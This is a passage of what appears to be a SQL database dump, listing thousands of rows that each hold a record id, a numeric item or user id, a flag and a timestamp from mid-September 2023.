16:26:56'),(84826,76,1,'2023-09-11','2023-09-11 16:27:35'),(84827,1544,1,'2023-09-11','2023-09-11 16:33:44'),(84828,1544,1,'2023-09-11','2023-09-11 16:34:40'),(84829,473,1,'2023-09-11','2023-09-11 16:44:27'),(84830,5307,1,'2023-09-11','2023-09-11 16:50:42'),(84831,474,1,'2023-09-11','2023-09-11 18:01:27'),(84832,3781,1,'2023-09-11','2023-09-11 18:18:25'),(84833,3004,1,'2023-09-11','2023-09-11 18:55:03'),(84834,3704,1,'2023-09-11','2023-09-11 19:22:29'),(84835,4983,1,'2023-09-11','2023-09-11 19:46:41'),(84836,4520,1,'2023-09-11','2023-09-11 19:50:46'),(84837,4976,1,'2023-09-11','2023-09-11 20:01:40'),(84838,5304,1,'2023-09-11','2023-09-11 20:22:25'),(84839,4888,1,'2023-09-11','2023-09-11 20:57:41'),(84840,5280,1,'2023-09-11','2023-09-11 21:20:43'),(84841,2748,1,'2023-09-12','2023-09-12 01:52:44'),(84842,4960,1,'2023-09-12','2023-09-12 01:52:47'),(84843,4960,1,'2023-09-12','2023-09-12 02:08:04'),(84844,4323,1,'2023-09-12','2023-09-12 02:12:01'),(84845,4612,1,'2023-09-12','2023-09-12 02:44:10'),(84846,4323,1,'2023-09-12','2023-09-12 03:09:53'),(84847,4960,1,'2023-09-12','2023-09-12 03:22:44'),(84848,4323,1,'2023-09-12','2023-09-12 03:35:33'),(84849,3691,1,'2023-09-12','2023-09-12 03:54:26'),(84850,2748,1,'2023-09-12','2023-09-12 04:02:48'),(84851,4520,1,'2023-09-12','2023-09-12 04:07:44'),(84852,4238,1,'2023-09-12','2023-09-12 04:25:15'),(84853,4529,1,'2023-09-12','2023-09-12 05:08:46'),(84854,5292,1,'2023-09-12','2023-09-12 06:01:18'),(84855,5320,1,'2023-09-12','2023-09-12 06:54:04'),(84856,5122,1,'2023-09-12','2023-09-12 07:01:19'),(84857,5256,1,'2023-09-12','2023-09-12 07:06:47'),(84858,570,1,'2023-09-12','2023-09-12 07:06:48'),(84859,4457,1,'2023-09-12','2023-09-12 07:27:20'),(84860,2309,1,'2023-09-12','2023-09-12 07:41:15'),(84861,5295,1,'2023-09-12','2023-09-12 08:10:27'),(84862,5253,1,'2023-09-12','2023-09-12 09:09:07'),(84863,4238,1,'2023-09-12','2023-09-12 10:19:59'),(84864,5080,1,'2023-09-12','2023-09-12 10:23:13'),(84865,4911,1,'2023-09-12','2023-09-12 10:36:00'),(84866,5320,1,'2023-09-12','2023-09-12 10:49:06'),(84867,4759,1,'2023-09-12','2023-09-12 10:56:28'),(84868,2904,1,'2023-09-12','2023-09-12 11:10:32'),(84869,4911,1,'2023-09-12','2023-09-12 11:22:14'),(84870,91,1,'2023-09-12','2023-09-12 11:31:35'),(84871,1722,1,'2023-09-12','2023-09-12 11:50:56'),(84872,2904,1,'2023-09-12','2023-09-12 12:03:47'),(84873,5080,1,'2023-09-12','2023-09-12 12:21:48'),(84874,2911,1,'2023-09-12','2023-09-12 12:34:48'),(84875,487,1,'2023-09-12','2023-09-12 12:38:38'),(84876,473,1,'2023-09-12','2023-09-12 12:38:38'),(84877,4911,1,'2023-09-12','2023-09-12 13:02:13'),(84878,4677,1,'2023-09-12','2023-09-12 13:34:01'),(84879,3269,1,'2023-09-12','2023-09-12 13:39:46'),(84880,4412,1,'2023-09-12','2023-09-12 13:39:55'),(84881,4759,1,'2023-09-12','2023-09-12 13:39:57'),(84882,467,1,'2023-09-12','2023-09-12 13:39:58'),(84883,3030,1,'2023-09-12','2023-09-12 13:49:57'),(84884,3269,1,'2023-09-12','2023-09-12 14:06:57'),(84885,1596,1,'2023-09-12','2023-09-12 14:19:08'),(84886,467,1,'2023-09-12','2023-09-12 14:24:55'),(84887,4524,1,'2023-09-12','2023-09-12 14:29:07'),(84888,2704,1,'2023-09-12','2023-09-12 14:39:29'),(84889,4520,1,'2023-09-12','2023-09-12 14:39:53'),(84890,80,1,'2023-09-12','2023-09-12 14:40:35'),(84891,4674,1,'2023-09-12','2023-09-12 14:56:47'),(84892,470,1,'2023-09-12','2023-09-12 15:04:25'),(84893,72,1,'2023-09-12','2023-09-12 15:13:41'),(84894,1598,1,'2023-09-12','2023-09-12 15:56:43'),(84895,4960,1,'2023-09-12','2023-09-12 16:13:50'),(84896,4412,1,'2023-09-12','2023-09-12 16:21:06'),(84897,1598,1,'2023-09-12','2023-09-12 16:22:27'),(84898,4911,1,'2023-09-12','2023-09-12 17:08:12'),(84899,4911,1,'2023-09-12','2023-09-12 17:08:31'),(84900,3092,1,'2023-09-12','2023-09-12 17:29:51'),(84901,5280,1,'2023-09-12','2023-09-12 18:50:14'),(84902,5280,1,'2023-09-12','2023-09-12 20:14:16'),(84903,4520,1,'2023-09-12','2023-09-12 21:09:54'),(84904,2813,1,'2023-09-12','2023-09-12 22:59:08'),(84905,473,1,'2023-09-13','2023-09-13 00:27:45'),(84906,3704,1,'2023-09-13','2023-09-13 00:29:08'),(84907,4691,1,'2023-09-13','2023-09-13 01:59:07'),(84908,5346,1,'2023-09-13','2023-09-13 02:15:30'),(84909,4911,1,'2023-09-13','2023-09-13 02:34:50'),(84910,4785,1,'2023-09-13','2023-09-13 02:41:55'),(84911,3090,1,'2023-09-13','2023-09-13 03:26:52'),(84912,3430,1,'2023-09-13','2023-09-13 03:57:05'),(84913,3090,1,'2023-09-13','2023-09-13 04:11:54'),(84914,5289,1,'2023-09-13','2023-09-13 04:26:54'),(84915,1718,1,'2023-09-13','2023-09-13 04:56:07'),(84916,1718,1,'2023-09-13','2023-09-13 05:09:15'),(84917,4703,1,'2023-09-13','2023-09-13 05:12:04'),(84918,2993,1,'2023-09-13','2023-09-13 05:42:56'),(84919,3691,1,'2023-09-13','2023-09-13 06:28:07'),(84920,1612,1,'2023-09-13','2023-09-13 07:22:09'),(84921,76,1,'2023-09-13','2023-09-13 07:23:29'),(84922,68,1,'2023-09-13','2023-09-13 07:24:29'),(84923,76,1,'2023-09-13','2023-09-13 07:25:08'),(84924,5337,1,'2023-09-13','2023-09-13 08:42:04'),(84925,5163,1,'2023-09-13','2023-09-13 08:45:42'),(84926,1718,1,'2023-09-13','2023-09-13 09:06:35'),(84927,4944,1,'2023-09-13','2023-09-13 09:11:46'),(84928,4911,1,'2023-09-13','2023-09-13 09:34:25'),(84929,473,1,'2023-09-13','2023-09-13 09:39:58'),(84930,4911,1,'2023-09-13','2023-09-13 09:43:47'),(84931,89,1,'2023-09-13','2023-09-13 09:44:32'),(84932,91,1,'2023-09-13','2023-09-13 10:32:59'),(84933,5264,1,'2023-09-13','2023-09-13 10:33:26'),(84934,5264,1,'2023-09-13','2023-09-13 10:33:27'),(84935,4911,1,'2023-09-13','2023-09-13 11:32:55'),(84936,91,1,'2023-09-13','2023-09-13 11:41:23'),(84937,5067,1,'2023-09-13','2023-09-13 11:43:30'),(84938,5067,1,'2023-09-13','2023-09-13 11:43:32'),(84939,91,1,'2023-09-13','2023-09-13 11:45:44'),(84940,5140,1,'2023-09-13','2023-09-13 11:46:01'),(84941,5140,1,'2023-09-13','2023-09-13 11:46:03'),(84942,1608,1,'2023-09-13','2023-09-13 12:08:58'),(84943,3104,1,'2023-09-13','2023-09-13 12:31:14'),(84944,89,1,'2023-09-13','2023-09-13 12:32:07'),(84945,1600,1,'2023-09-13','2023-09-13 12:32:23'),(84946,3104,1,'2023-09-13','2023-09-13 12:33:04'),(84947,4608,1,'2023-09-13','2023-09-13 12:47:28'),(84948,4888,1,'2023-09-13','2023-09-13 12:59:02'),(84949,5140,1,'2023-09-13','2023-09-13 13:50:18'),(84950,2609,1,'2023-09-13','2023-09-13 14:12:41'),(84951,4977,1,'2023-09-13','2023-09-13 14:23:01'),(84952,4911,1,'2023-09-13','2023-09-13 14:32:09'),(84953,5330,1,'2023-09-13','2023-09-13 14:37:53'),(84954,4688,1,'2023-09-13','2023-09-13 14:45:25'),(84955,4911,1,'2023-09-13','2023-09-13 15:44:09'),(84956,4911,1,'2023-09-13','2023-09-13 15:44:42'),(84957,1877,1,'2023-09-13','2023-09-13 16:34:17'),(84958,5307,1,'2023-09-13','2023-09-13 16:34:18'),(84959,4827,1,'2023-09-13','2023-09-13 16:34:48'),(84960,4416,1,'2023-09-13','2023-09-13 16:39:57'),(84961,1608,1,'2023-09-13','2023-09-13 16:40:21'),(84962,3664,1,'2023-09-13','2023-09-13 16:42:00'),(84963,3664,1,'2023-09-13','2023-09-13 16:43:25'),(84964,4387,1,'2023-09-13','2023-09-13 17:28:11'),(84965,5163,1,'2023-09-13','2023-09-13 17:43:10'),(84966,5280,1,'2023-09-13','2023-09-13 18:04:13'),(84967,5280,1,'2023-09-13','2023-09-13 18:12:02'),(84968,4685,1,'2023-09-13','2023-09-13 18:37:23'),(84969,4776,1,'2023-09-13','2023-09-13 18:37:59'),(84970,2558,1,'2023-09-13','2023-09-13 18:38:04'),(84971,4694,1,'2023-09-13','2023-09-13 18:40:28'),(84972,2609,1,'2023-09-13','2023-09-13 19:42:03'),(84973,108,1,'2023-09-13','2023-09-13 20:13:45'),(84974,3764,1,'2023-09-13','2023-09-13 20:23:26'),(84975,4911,1,'2023-09-13','2023-09-13 20:49:43'),(84976,91,1,'2023-09-13','2023-09-13 21:40:22'),(84977,5374,1,'2023-09-13','2023-09-13 21:40:37'),(84978,5374,1,'2023-09-13','2023-09-13 21:42:52'),(84979,5374,1,'2023-09-13','2023-09-13 21:44:22'),(84980,5374,1,'2023-09-13','2023-09-13 21:46:56'),(84981,108,1,'2023-09-13','2023-09-13 21:59:26'),(84982,335,1,'2023-09-13','2023-09-13 22:30:49'),(84983,4681,1,'2023-09-13','2023-09-13 22:42:04'),(84984,4551,1,'2023-09-13','2023-09-13 23:04:00'),(84985,1592,1,'2023-09-13','2023-09-13 23:07:58'),(84986,5307,1,'2023-09-13','2023-09-13 23:48:59'),(84987,1594,1,'2023-09-14','2023-09-14 00:46:12'),(84988,5359,1,'2023-09-14','2023-09-14 01:25:31'),(84989,5253,1,'2023-09-14','2023-09-14 01:45:01'),(84990,3313,1,'2023-09-14','2023-09-14 01:48:01'),(84991,4517,1,'2023-09-14','2023-09-14 04:07:59'),(84992,80,1,'2023-09-14','2023-09-14 04:09:45'),(84993,80,1,'2023-09-14','2023-09-14 04:10:26'),(84994,5304,1,'2023-09-14','2023-09-14 04:18:25'),(84995,4412,1,'2023-09-14','2023-09-14 04:18:59'),(84996,2769,1,'2023-09-14','2023-09-14 04:58:23'),(84997,3090,1,'2023-09-14','2023-09-14 05:08:02'),(84998,484,1,'2023-09-14','2023-09-14 05:23:11'),(84999,5280,1,'2023-09-14','2023-09-14 05:38:00'),(85000,4709,1,'2023-09-14','2023-09-14 05:47:59'),(85001,5253,1,'2023-09-14','2023-09-14 05:49:08'),(85002,5307,1,'2023-09-14','2023-09-14 06:05:02'),(85003,5134,1,'2023-09-14','2023-09-14 06:19:01'),(85004,4776,1,'2023-09-14','2023-09-14 06:34:43'),(85005,2159,1,'2023-09-14','2023-09-14 06:34:57'),(85006,4517,1,'2023-09-14','2023-09-14 06:43:46'),(85007,1870,1,'2023-09-14','2023-09-14 06:44:27'),(85008,473,1,'2023-09-14','2023-09-14 06:44:27'),(85009,3313,1,'2023-09-14','2023-09-14 06:47:59'),(85010,5280,1,'2023-09-14','2023-09-14 07:05:04'),(85011,4238,1,'2023-09-14','2023-09-14 07:41:57'),(85012,4681,1,'2023-09-14','2023-09-14 07:49:01'),(85013,91,1,'2023-09-14','2023-09-14 07:51:38'),(85014,5363,1,'2023-09-14','2023-09-14 07:51:51'),(85015,5363,1,'2023-09-14','2023-09-14 07:51:52'),(85016,91,1,'2023-09-14','2023-09-14 07:52:36'),(85017,5374,1,'2023-09-14','2023-09-14 07:53:19'),(85018,5374,1,'2023-09-14','2023-09-14 07:53:21'),(85019,5134,1,'2023-09-14','2023-09-14 08:04:23'),(85020,3691,1,'2023-09-14','2023-09-14 08:18:34'),(85021,3764,1,'2023-09-14','2023-09-14 08:30:43'),(85022,5307,1,'2023-09-14','2023-09-14 08:41:33'),(85023,1606,1,'2023-09-14','2023-09-14 08:44:26'),(85024,1872,1,'2023-09-14','2023-09-14 08:57:30'),(85025,2395,1,'2023-09-14','2023-09-14 08:57:50'),(85026,3240,1,'2023-09-14','2023-09-14 09:03:35'),(85027,5295,1,'2023-09-14','2023-09-14 09:14:04'),(85028,3764,1,'2023-09-14','2023-09-14 09:24:23'),(85029,5292,1,'2023-09-14','2023-09-14 09:36:18'),(85030,5042,1,'2023-09-14','2023-09-14 09:44:02'),(85031,4960,1,'2023-09-14','2023-09-14 09:48:45'),(85032,2904,1,'2023-09-14','2023-09-14 09:49:10'),(85033,4960,1,'2023-09-14','2023-09-14 09:50:02'),(85034,4622,1,'2023-09-14','2023-09-14 09:52:00'),(85035,72,1,'2023-09-14','2023-09-14 09:55:10'),(85036,5109,1,'2023-09-14','2023-09-14 09:55:32'),(85037,5310,1,'2023-09-14','2023-09-14 10:01:59'),(85038,5301,1,'2023-09-14','2023-09-14 10:23:11'),(85039,4950,1,'2023-09-14','2023-09-14 10:25:56'),(85040,474,1,'2023-09-14','2023-09-14 10:28:39'),(85041,4911,1,'2023-09-14','2023-09-14 10:29:38'),(85042,473,1,'2023-09-14','2023-09-14 10:38:51'),(85043,1745,1,'2023-09-14','2023-09-14 10:39:17'),(85044,3030,1,'2023-09-14','2023-09-14 10:40:32'),(85045,473,1,'2023-09-14','2023-09-14 10:41:46'),(85046,5301,1,'2023-09-14','2023-09-14 10:46:56'),(85047,5307,1,'2023-09-14','2023-09-14 11:11:22'),(85048,5304,1,'2023-09-14','2023-09-14 11:25:32'),(85049,4608,1,'2023-09-14','2023-09-14 11:29:14'),(85050,4668,1,'2023-09-14','2023-09-14 11:41:44'),(85051,5289,1,'2023-09-14','2023-09-14 11:48:25'),(85052,5304,1,'2023-09-14','2023-09-14 12:01:12'),(85053,5310,1,'2023-09-14','2023-09-14 12:05:35'),(85054,1600,1,'2023-09-14','2023-09-14 12:14:32'),(85055,4681,1,'2023-09-14','2023-09-14 12:33:35'),(85056,4703,1,'2023-09-14','2023-09-14 12:34:46'),(85057,4674,1,'2023-09-14','2023-09-14 12:52:50'),(85058,4966,1,'2023-09-14','2023-09-14 12:57:55'),(85059,2904,1,'2023-09-14','2023-09-14 12:58:29'),(85060,1751,1,'2023-09-14','2023-09-14 13:08:42'),(85061,4706,1,'2023-09-14','2023-09-14 13:10:07'),(85062,4697,1,'2023-09-14','2023-09-14 13:12:30'),(85063,4677,1,'2023-09-14','2023-09-14 13:25:25'),(85064,4448,1,'2023-09-14','2023-09-14 13:29:55'),(85065,3731,1,'2023-09-14','2023-09-14 13:33:36'),(85066,4524,1,'2023-09-14','2023-09-14 13:40:55'),(85067,4694,1,'2023-09-14','2023-09-14 13:43:54'),(85068,3731,1,'2023-09-14','2023-09-14 13:49:09'),(85069,468,1,'2023-09-14','2023-09-14 13:52:55'),(85070,4747,1,'2023-09-14','2023-09-14 14:00:23'),(85071,4709,1,'2023-09-14','2023-09-14 14:07:38'),(85072,473,1,'2023-09-14','2023-09-14 14:07:56'),(85073,4911,1,'2023-09-14','2023-09-14 14:12:35'),(85074,1728,1,'2023-09-14','2023-09-14 14:13:46'),(85075,89,1,'2023-09-14','2023-09-14 14:19:33'),(85076,4944,1,'2023-09-14','2023-09-14 14:26:01'),(85077,3034,1,'2023-09-14','2023-09-14 14:28:05'),(85078,1728,1,'2023-09-14','2023-09-14 14:29:06'),(85079,4529,1,'2023-09-14','2023-09-14 14:32:51'),(85080,4768,1,'2023-09-14','2023-09-14 14:34:13'),(85081,470,1,'2023-09-14','2023-09-14 14:34:31'),(85082,4980,1,'2023-09-14','2023-09-14 14:34:44'),(85083,4700,1,'2023-09-14','2023-09-14 14:47:01'),(85084,4517,1,'2023-09-14','2023-09-14 14:47:04'),(85085,4520,1,'2023-09-14','2023-09-14 14:49:18'),(85086,4750,1,'2023-09-14','2023-09-14 14:50:12'),(85087,1594,1,'2023-09-14','2023-09-14 14:50:44'),(85088,1737,1,'2023-09-14','2023-09-14 14:59:33'),(85089,4753,1,'2023-09-14','2023-09-14 15:00:05'),(85090,4988,1,'2023-09-14','2023-09-14 15:04:11'),(85091,5334,1,'2023-09-14','2023-09-14 15:11:38'),(85092,4768,1,'2023-09-14','2023-09-14 15:19:12'),(85093,5128,1,'2023-09-14','2023-09-14 15:19:14'),(85094,1722,1,'2023-09-14','2023-09-14 15:19:46'),(85095,5323,1,'2023-09-14','2023-09-14 15:26:53'),(85096,5131,1,'2023-09-14','2023-09-14 15:31:42'),(85097,4454,1,'2023-09-14','2023-09-14 15:34:40'),(85098,4938,1,'2023-09-14','2023-09-14 15:46:39'),(85099,5058,1,'2023-09-14','2023-09-14 15:52:14'),(85100,5137,1,'2023-09-14','2023-09-14 15:56:43'),(85101,3034,1,'2023-09-14','2023-09-14 16:02:40'),(85102,4688,1,'2023-09-14','2023-09-14 16:05:01'),(85103,4712,1,'2023-09-14','2023-09-14 16:23:58'),(85104,4529,1,'2023-09-14','2023-09-14 16:25:42'),(85105,4520,1,'2023-09-14','2023-09-14 16:32:20'),(85106,468,1,'2023-09-14','2023-09-14 16:42:33'),(85107,5256,1,'2023-09-14','2023-09-14 17:16:41'),(85108,4551,1,'2023-09-14','2023-09-14 17:18:59'),(85109,4566,1,'2023-09-14','2023-09-14 17:20:11'),(85110,487,1,'2023-09-14','2023-09-14 17:38:28'),(85111,1544,1,'2023-09-14','2023-09-14 17:38:29'),(85112,5101,1,'2023-09-14','2023-09-14 17:50:59'),(85113,4691,1,'2023-09-14','2023-09-14 18:13:19'),(85114,1872,1,'2023-09-14','2023-09-14 18:18:01'),(85115,4685,1,'2023-09-14','2023-09-14 18:44:11'),(85116,2159,1,'2023-09-14','2023-09-14 18:46:18'),(85117,5292,1,'2023-09-14','2023-09-14 18:51:21'),(85118,5256,1,'2023-09-14','2023-09-14 18:58:05'),(85119,3731,1,'2023-09-14','2023-09-14 18:59:39'),(85120,5280,1,'2023-09-14','2023-09-14 19:09:39'),(85121,4514,1,'2023-09-14','2023-09-14 19:27:27'),(85122,91,1,'2023-09-14','2023-09-14 19:45:38'),(85123,5374,1,'2023-09-14','2023-09-14 20:06:37'),(85124,91,1,'2023-09-14','2023-09-14 20:07:05'),(85125,5378,1,'2023-09-14','2023-09-14 20:07:42'),(85126,5378,1,'2023-09-14','2023-09-14 20:07:44'),(85127,76,1,'2023-09-14','2023-09-14 20:19:41'),(85128,4911,1,'2023-09-14','2023-09-14 20:57:31'),(85129,3083,1,'2023-09-14','2023-09-14 21:13:09'),(85130,5276,1,'2023-09-14','2023-09-14 21:45:51'),(85131,1544,1,'2023-09-14','2023-09-14 22:07:30'),(85132,4608,1,'2023-09-14','2023-09-14 22:49:20'),(85133,3004,1,'2023-09-14','2023-09-14 23:01:10'),(85134,3030,1,'2023-09-14','2023-09-14 23:04:16'),(85135,5320,1,'2023-09-15','2023-09-15 00:18:51'),(85136,5125,1,'2023-09-15','2023-09-15 00:35:55'),(85137,3175,1,'2023-09-15','2023-09-15 01:58:59'),(85138,4776,1,'2023-09-15','2023-09-15 02:16:16'),(85139,5295,1,'2023-09-15','2023-09-15 02:31:43'),(85140,4517,1,'2023-09-15','2023-09-15 03:37:02'),(85141,468,1,'2023-09-15','2023-09-15 03:43:35'),(85142,4700,1,'2023-09-15','2023-09-15 03:49:14'),(85143,1596,1,'2023-09-15','2023-09-15 03:58:27'),(85144,4977,1,'2023-09-15','2023-09-15 04:33:57'),(85145,3680,1,'2023-09-15','2023-09-15 04:43:47'),(85146,4976,1,'2023-09-15','2023-09-15 04:46:34'),(85147,473,1,'2023-09-15','2023-09-15 04:59:27'),(85148,1596,1,'2023-09-15','2023-09-15 05:04:13'),(85149,5122,1,'2023-09-15','2023-09-15 05:04:30'),(85150,4977,1,'2023-09-15','2023-09-15 05:12:19'),(85151,4980,1,'2023-09-15','2023-09-15 05:25:45'),(85152,474,1,'2023-09-15','2023-09-15 06:12:44'),(85153,5280,1,'2023-09-15','2023-09-15 06:14:01'),(85154,1582,1,'2023-09-15','2023-09-15 06:44:44'),(85155,2775,1,'2023-09-15','2023-09-15 08:41:52'),(85156,4911,1,'2023-09-15','2023-09-15 09:13:28'),(85157,4373,1,'2023-09-15','2023-09-15 09:42:01'),(85158,1596,1,'2023-09-15','2023-09-15 09:45:20'),(85159,2704,1,'2023-09-15','2023-09-15 10:19:31'),(85160,1544,1,'2023-09-15','2023-09-15 10:28:47'),(85161,91,1,'2023-09-15','2023-09-15 10:29:19'),(85162,68,1,'2023-09-15','2023-09-15 10:54:50'),(85163,4911,1,'2023-09-15','2023-09-15 10:54:58'),(85164,3083,1,'2023-09-15','2023-09-15 11:22:03'),(85165,3004,1,'2023-09-15','2023-09-15 11:22:53'),(85166,3083,1,'2023-09-15','2023-09-15 11:23:16'),(85167,5101,1,'2023-09-15','2023-09-15 11:25:53'),(85168,3004,1,'2023-09-15','2023-09-15 11:26:11'),(85169,4911,1,'2023-09-15','2023-09-15 11:32:23'),(85170,473,1,'2023-09-15','2023-09-15 12:33:05'),(85171,5289,1,'2023-09-15','2023-09-15 12:33:50'),(85172,4759,1,'2023-09-15','2023-09-15 12:52:17'),(85173,3271,1,'2023-09-15','2023-09-15 12:52:27'),(85174,1594,1,'2023-09-15','2023-09-15 13:26:31'),(85175,474,1,'2023-09-15','2023-09-15 13:55:41'),(85176,1594,1,'2023-09-15','2023-09-15 13:57:52'),(85177,470,1,'2023-09-15','2023-09-15 14:05:39'),(85178,4911,1,'2023-09-15','2023-09-15 14:09:11'),(85179,4960,1,'2023-09-15','2023-09-15 14:50:11'),(85180,4930,1,'2023-09-15','2023-09-15 14:51:06'),(85181,4911,1,'2023-09-15','2023-09-15 14:51:41'),(85182,4524,1,'2023-09-15','2023-09-15 14:51:52'),(85183,4966,1,'2023-09-15','2023-09-15 14:51:56'),(85184,4960,1,'2023-09-15','2023-09-15 14:52:35'),(85185,2159,1,'2023-09-15','2023-09-15 14:54:33'),(85186,4768,1,'2023-09-15','2023-09-15 15:14:26'),(85187,5122,1,'2023-09-15','2023-09-15 15:14:39'),(85188,4677,1,'2023-09-15','2023-09-15 15:19:26'),(85189,1582,1,'2023-09-15','2023-09-15 15:21:12'),(85190,5128,1,'2023-09-15','2023-09-15 15:36:52'),(85191,4436,1,'2023-09-15','2023-09-15 15:43:54'),(85192,4747,1,'2023-09-15','2023-09-15 15:54:56'),(85193,3691,1,'2023-09-15','2023-09-15 16:00:08'),(85194,4911,1,'2023-09-15','2023-09-15 16:03:49'),(85195,5334,1,'2023-09-15','2023-09-15 16:12:57'),(85196,5128,1,'2023-09-15','2023-09-15 16:30:54'),(85197,87,1,'2023-09-15','2023-09-15 16:35:16'),(85198,4988,1,'2023-09-15','2023-09-15 16:44:26'),(85199,5280,1,'2023-09-15','2023-09-15 17:29:45'),(85200,5334,1,'2023-09-15','2023-09-15 18:08:15'),(85201,1594,1,'2023-09-15','2023-09-15 18:08:36'),(85202,3102,1,'2023-09-15','2023-09-15 19:12:27'),(85203,4753,1,'2023-09-15','2023-09-15 20:04:48'),(85204,4911,1,'2023-09-15','2023-09-15 20:20:04'),(85205,4753,1,'2023-09-15','2023-09-15 21:04:42'),(85206,1594,1,'2023-09-15','2023-09-15 21:36:29'),(85207,4681,1,'2023-09-15','2023-09-15 22:03:49'),(85208,4517,1,'2023-09-15','2023-09-15 22:05:01'),(85209,4703,1,'2023-09-15','2023-09-15 22:05:07'),(85210,4938,1,'2023-09-15','2023-09-15 23:06:05'),(85211,4691,1,'2023-09-15','2023-09-15 23:09:51'),(85212,1600,1,'2023-09-15','2023-09-15 23:19:59'),(85213,2704,1,'2023-09-15','2023-09-15 23:35:07'),(85214,5280,1,'2023-09-15','2023-09-15 23:36:43'),(85215,4396,1,'2023-09-16','2023-09-16 00:38:44'),(85216,68,1,'2023-09-16','2023-09-16 00:56:01'),(85217,4440,1,'2023-09-16','2023-09-16 00:59:05'),(85218,1614,1,'2023-09-16','2023-09-16 01:51:47'),(85219,5080,1,'2023-09-16','2023-09-16 03:04:58'),(85220,5080,1,'2023-09-16','2023-09-16 03:38:45'),(85221,4950,1,'2023-09-16','2023-09-16 04:23:44'),(85222,4396,1,'2023-09-16','2023-09-16 04:51:45'),(85223,5125,1,'2023-09-16','2023-09-16 05:09:03'),(85224,5320,1,'2023-09-16','2023-09-16 05:27:07'),(85225,470,1,'2023-09-16','2023-09-16 06:21:43'),(85226,5268,1,'2023-09-16','2023-09-16 06:50:24'),(85227,1598,1,'2023-09-16','2023-09-16 07:01:36'),(85228,80,1,'2023-09-16','2023-09-16 07:02:00'),(85229,1598,1,'2023-09-16','2023-09-16 07:02:11'),(85230,5323,1,'2023-09-16','2023-09-16 07:27:05'),(85231,5280,1,'2023-09-16','2023-09-16 07:51:41'),(85232,1600,1,'2023-09-16','2023-09-16 07:56:45'),(85233,5122,1,'2023-09-16','2023-09-16 08:33:44'),(85234,1722,1,'2023-09-16','2023-09-16 08:40:11'),(85235,5334,1,'2023-09-16','2023-09-16 08:51:54'),(85236,5128,1,'2023-09-16','2023-09-16 08:58:27'),(85237,470,1,'2023-09-16','2023-09-16 09:00:22'),(85238,5134,1,'2023-09-16','2023-09-16 09:07:01'),(85239,470,1,'2023-09-16','2023-09-16 09:14:37'),(85240,4768,1,'2023-09-16','2023-09-16 09:21:43'),(85241,4988,1,'2023-09-16','2023-09-16 09:23:21'),(85242,5317,1,'2023-09-16','2023-09-16 09:39:13'),(85243,4977,1,'2023-09-16','2023-09-16 09:47:23'),(85244,1713,1,'2023-09-16','2023-09-16 10:20:36'),(85245,5320,1,'2023-09-16','2023-09-16 11:16:41'),(85246,4750,1,'2023-09-16','2023-09-16 11:17:19'),(85247,3781,1,'2023-09-16','2023-09-16 11:17:45'),(85248,3030,1,'2023-09-16','2023-09-16 11:44:40'),(85249,4977,1,'2023-09-16','2023-09-16 12:28:58'),(85250,4911,1,'2023-09-16','2023-09-16 13:11:35'),(85251,5140,1,'2023-09-16','2023-09-16 13:49:07'),(85252,1870,1,'2023-09-16','2023-09-16 13:49:13'),(85253,4911,1,'2023-09-16','2023-09-16 14:00:11'),(85254,5271,1,'2023-09-16','2023-09-16 14:01:59'),(85255,2154,1,'2023-09-16','2023-09-16 14:09:58'),(85256,473,1,'2023-09-16','2023-09-16 14:31:08'),(85257,4681,1,'2023-09-16','2023-09-16 14:34:07'),(85258,68,1,'2023-09-16','2023-09-16 14:51:48'),(85259,1610,1,'2023-09-16','2023-09-16 15:19:05'),(85260,469,1,'2023-09-16','2023-09-16 15:23:37'),(85261,5140,1,'2023-09-16','2023-09-16 15:38:00'),(85262,469,1,'2023-09-16','2023-09-16 15:43:41'),(85263,1713,1,'2023-09-16','2023-09-16 15:55:58'),(85264,470,1,'2023-09-16','2023-09-16 16:04:06'),(85265,3107,1,'2023-09-16','2023-09-16 16:30:33'),(85266,474,1,'2023-09-16','2023-09-16 16:59:00'),(85267,1610,1,'2023-09-16','2023-09-16 17:10:19'),(85268,3764,1,'2023-09-16','2023-09-16 18:14:04'),(85269,5163,1,'2023-09-16','2023-09-16 19:03:27'),(85270,5163,1,'2023-09-16','2023-09-16 19:05:45'),(85271,3079,1,'2023-09-16','2023-09-16 19:17:43'),(85272,4960,1,'2023-09-16','2023-09-16 19:20:00'),(85273,1612,1,'2023-09-16','2023-09-16 19:43:59'),(85274,4391,1,'2023-09-16','2023-09-16 22:31:20'),(85275,2159,1,'2023-09-16','2023-09-16 22:47:36'),(85276,1606,1,'2023-09-17','2023-09-17 00:02:06'),(85277,1606,1,'2023-09-17','2023-09-17 00:03:49'),(85278,4753,1,'2023-09-17','2023-09-17 00:35:00'),(85279,3738,1,'2023-09-17','2023-09-17 00:59:57'),(85280,5163,1,'2023-09-17','2023-09-17 01:30:38'),(85281,4980,1,'2023-09-17','2023-09-17 01:44:59'),(85282,3764,1,'2023-09-17','2023-09-17 01:52:37'),(85283,473,1,'2023-09-17','2023-09-17 02:15:28'),(85284,4587,1,'2023-09-17','2023-09-17 02:19:40'),(85285,4335,1,'2023-09-17','2023-09-17 02:24:18'),(85286,474,1,'2023-09-17','2023-09-17 02:28:59'),(85287,472,1,'2023-09-17','2023-09-17 02:51:45'),(85288,4587,1,'2023-09-17','2023-09-17 03:01:15'),(85289,4335,1,'2023-09-17','2023-09-17 03:10:08'),(85290,1715,1,'2023-09-17','2023-09-17 03:12:46'),(85291,4911,1,'2023-09-17','2023-09-17 03:13:49'),(85292,472,1,'2023-09-17','2023-09-17 03:28:22'),(85293,89,1,'2023-09-17','2023-09-17 03:46:47'),(85294,5280,1,'2023-09-17','2023-09-17 03:52:53'),(85295,5248,1,'2023-09-17','2023-09-17 03:52:59'),(85296,5134,1,'2023-09-17','2023-09-17 03:53:20'),(85297,5140,1,'2023-09-17','2023-09-17 03:54:53'),(85298,1612,1,'2023-09-17','2023-09-17 04:33:17'),(85299,4938,1,'2023-09-17','2023-09-17 04:40:46'),(85300,3259,1,'2023-09-17','2023-09-17 04:41:33'),(85301,1737,1,'2023-09-17','2023-09-17 04:45:02'),(85302,5280,1,'2023-09-17','2023-09-17 05:25:15'),(85303,5256,1,'2023-09-17','2023-09-17 05:25:46'),(85304,5122,1,'2023-09-17','2023-09-17 05:32:21'),(85305,4685,1,'2023-09-17','2023-09-17 05:48:15'),(85306,4768,1,'2023-09-17','2023-09-17 06:01:03'),(85307,468,1,'2023-09-17','2023-09-17 06:07:19'),(85308,5289,1,'2023-09-17','2023-09-17 06:25:45'),(85309,2769,1,'2023-09-17','2023-09-17 06:41:58'),(85310,2769,1,'2023-09-17','2023-09-17 07:04:29'),(85311,5353,1,'2023-09-17','2023-09-17 